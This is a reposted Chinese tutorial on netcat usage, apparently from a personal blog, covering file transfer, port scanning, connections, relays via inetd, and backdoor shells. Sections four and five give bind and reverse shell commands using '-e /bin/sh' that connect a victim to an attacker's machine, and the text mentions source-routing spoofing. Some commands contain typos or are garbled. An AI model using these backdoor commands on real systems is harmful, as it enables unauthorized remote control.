[转载]NETCAT：多功能网络工具

信息来源：www.cppl.net（此站点禁止文章拷贝 B4）

netcat的原理简单得有点让人不相信：它只是让用户通过网络传递数据，功能上很像UNIX的cat命令。然而，cat命令只是在本地系统上对数据进行转移，而netcat则是通过TCP或UDP的端口转移任意数据。它更像一个一般性的网络工具，可用来从任意一个TCP或UDP端口到另外的任意一个TCP或UDP端口传输和接收数据。还支持源路由，可以用来进行源路由欺骗攻击。下面是netcat的用法：
一：netcat用于文件传输
接受文件的目标机器：$nc -l -p 1234 > [fele]
发送文件的源机器： $nc [remote-machine] 1234 < [file]
另外netcat还可用来拉文件，实现命令是：
源机器，提供文件以进行传输：$nc -l -p 1234 < [file]
目标机器，拉文件: $nc -l -p 1234 > [file]
二 netcat用于端口扫描：
$ echo QUIT nc -v -w [target machine] [startport]-[eneport]
三 netcat用于建立到开放端口连接
$ nc -u [target-machine] [port]
四 netcat用于创建被动的后门命令shell
目标机器： $ nc -l -p [port] -e /bin/sh
攻击者的机器： $ nc [victim-macine] [port}
注意：目标机器是NT 的话把 -e 后面改成cmd.exe 就行了
五 netcat主动地推动一个后门命令shell
攻击者的机器：$ nc -l -p [port]
目标机器：$ nc [attckers-machine] [port] -e /bin/sh
六 netcat用于进行流量中继
有两种方法：就用UNIXL来举例吧。
第一种是使用inetd和netcat创建一个中继，所以应该在/etc/inetd.conf中加上一行，以让inted在某一端口进行监听，并以客户形式运行netcat以发送流量。下面/etc/inetd.conf中的这一行将使inted在TCP端口11111上监听，并运行netcat客户，netcat客户会将流量发往以net-hope为名的机器的TCP端口54321
：1111 stream tcp nowait nobody /usr/sbin/tcpd /usr/bin/nc [net-hop] 54321
哇，打字好慢，手也有点不舒服了。还是先写到这里吧！也不知道有没有人看~~哈哈